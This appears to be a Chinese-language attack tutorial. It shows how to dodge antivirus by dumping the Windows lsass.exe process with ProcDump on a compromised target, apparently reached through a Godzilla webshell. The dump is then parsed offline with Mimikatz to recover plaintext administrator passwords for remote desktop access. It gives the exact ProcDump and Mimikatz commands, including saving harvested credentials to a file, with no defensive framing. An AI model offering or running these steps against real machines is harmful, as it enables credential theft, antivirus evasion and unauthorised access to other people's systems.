利用procdump+Mimikatz绕过杀软获取Windows明文密码

1.原理

Mimikatz是从lsass.exe中提取明文密码的，当无法在目标机器上运行Mimikatz时，我们可使用ProcDump工具将系统的lsass.exe进程进行转储，导出dmp文件，拖回到本地后，在本地再利用Mimikatz进行读取

而ProcDump本身是作为一个正常的运维辅助工具使用，并不带毒，所以不会被杀软查杀

ProDump下载地址：

ProDump下载

---

2.实操部分

将工具拷贝到目标机器上，哥斯拉展示如下：

执行如下命令（需要管理员权限）：

ProcDump.exe -accepteula -ma lsass.exe lsass.dmp

dump成功：

下载到本地，开始使用Mimikatz进行分析：

mimikatz.exe "log" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

获取的信息中，得到管理员账户和密码，可以直接远程桌面连接：

为了方便也可以直接输出到密码本：

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full"> password.txt exit